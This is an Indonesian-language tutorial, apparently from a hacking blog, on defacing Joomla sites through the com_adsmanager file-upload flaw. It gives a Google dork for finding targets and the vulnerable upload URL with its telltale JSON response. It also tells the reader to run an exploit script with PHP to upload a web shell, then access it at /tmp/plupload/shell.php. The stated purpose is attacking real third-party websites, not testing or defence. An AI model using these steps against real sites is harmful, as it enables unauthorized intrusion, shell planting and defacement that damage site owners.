DEFACE DENGAN JOOMLA COM_ADSMANAGER

Hello, ketemu lagi sama ane , belakangan ini pada nyari 'Exploit Joomla Com_Adsmanager' katanya sih Private, iyaa emang Private, yaudah ane cari cari ehh gatau nya mirip Wordpress Themes Konzept :v tapi berhubung udah ada yang Share duluan yaudah ini ane Share juga :D
Langsung aja cekibrot, Bahan bahannya:


▐ Dork: inurl:/index.php?option=com_adsmanager site: Use Your Brain!
▐ Xampp 
▐ Exploit Com_Adsmanager

Instal dulu Xampp nya.
Cari target menggunakan Google Dork, kalo udah ketemu kasih Exploit ini di akhir Url nya, /index.php?option=com_adsmanager&task=upload&tmpl=component , jadi http://localhost/index.php?option=com_adsmanager&task=upload&tmpl=component kalo Vuln responnya {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_RandomNumber"}EX {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_16"}

Langsung exksekusi, Copykan Exploit Com_Adsmanager ke notepad ganti http://localhost/ dengan target ente kalo ada path nya sekalian path nya :v Shell.jpg/.php ganti dengan nama shell ente save dengan ekstensi PHP, kalo udah buka Xampp, masukin Command cd C:\Xampp\php lalu masukan lagi commandphp exploit.phpEX: php ads.php lalu enter.

Respon jika shell udah ke upload, {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "shell.php"}
akses Shell http://localhost/tmp/plupload/shell.php

Sekian tutor Priv8 ini tanya ane aja kalo bingung :D